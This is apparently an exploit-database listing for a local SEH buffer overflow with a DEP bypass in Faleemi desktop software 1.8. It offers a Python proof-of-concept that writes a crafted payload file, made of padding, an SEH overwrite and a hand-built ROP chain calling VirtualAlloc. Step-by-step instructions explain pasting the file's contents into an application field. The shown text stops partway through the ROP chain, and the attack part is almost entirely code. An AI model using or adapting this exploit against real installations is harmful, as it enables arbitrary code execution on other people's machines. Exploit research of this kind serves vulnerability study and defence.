Exploits / Vulnerability Discovered : 2019-01-28 |
Type : local |
Platform : windows
This exploit / vulnerability Faleemi desktop software 1.8 local buffer overflow (seh) (dep bypass) is for educational purposes only and if it is used you will do on your own risk!
# PoC
# 1. run script
# 2. open/copy contents of faleemidep.txt
# 3. open app, click on System Setup
# 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field
# 5. click on save
# 6. pop calc
# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains
# original seh poc from Gionathan "John" Reale, EDB: 45402
# badchars; \x00\x0a\x0d\x2f
import struct
filename = "faleemidep.txt"
junk = "A" * 264
#0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN
seh = "\x7e\xea\x01\x60"
fill = "C"*524
#VirtualAlloc()
#EDI = ROP NOP (RETN)
rop = struct.pack('<L',0x60018221) # POP EDI # RETN
rop += struct.pack('<L',0x60018222) # ROP-NOP
#ECX = flProtect (0x40)
rop += struct.pack('<L',0x60047e71) # POP ECX # RETN
rop += struct.pack('<L',0xffffffff)
for i in range(0,65): rop += struct.pack('<L',0x6004bcc7) # INC ECX # RETN
rop += struct.pack('<L',0xF33B8C98)
rop += struct.pack('<L',0x6004e5ce) # ADD EDX,EBX # POP EBX # RETN 0x10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10